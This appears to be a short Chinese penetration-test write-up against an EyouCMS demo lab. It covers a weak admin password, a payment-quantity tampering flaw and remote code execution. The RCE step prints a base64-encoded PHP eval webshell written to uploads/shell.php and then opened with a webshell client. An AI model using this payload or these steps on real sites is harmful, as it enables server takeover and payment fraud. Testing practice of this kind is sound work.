易优demo网站测试结果

易优demo网站测试结果-06

1、信息收集

网站账号：admin 密码：Aa123456

2、存在的漏洞

2.1 后台弱口令漏洞

http://eyoucms-s347fqn.gxalabs.com/login.php?s=Admin/login

网站账号：admin 密码：Aa123456

成功登陆

2.2 代码远程执行漏洞

漏洞链接
http://xxxx.com/login.php

点击进入之后是这个样子

选择pc文件下的index文件

输入一句话代码

 file_put_contents("./uploads/shell.php",base64_decode("PD9waHAgZXZhbCgkX1JFUVVFU1RbNjY2XSk7Pz4="));?>

点击确认提交

然后返回首页，访问upload/shell.php 文件

代码执行成功

连接蚁剑，成功连接

2.3 支付漏洞

漏洞链接
http://eyoucms-s347fqn.gxalabs.com/?m=home&c=View&a=index&aid=100

点击立即购买

抓包修改数量为2

点击提交订单

然后就会发现，金额不对

原价5499*2=10998

2.6 xss漏洞

漏洞点基本信息

http://eyoucms.gxalabs.com/login.php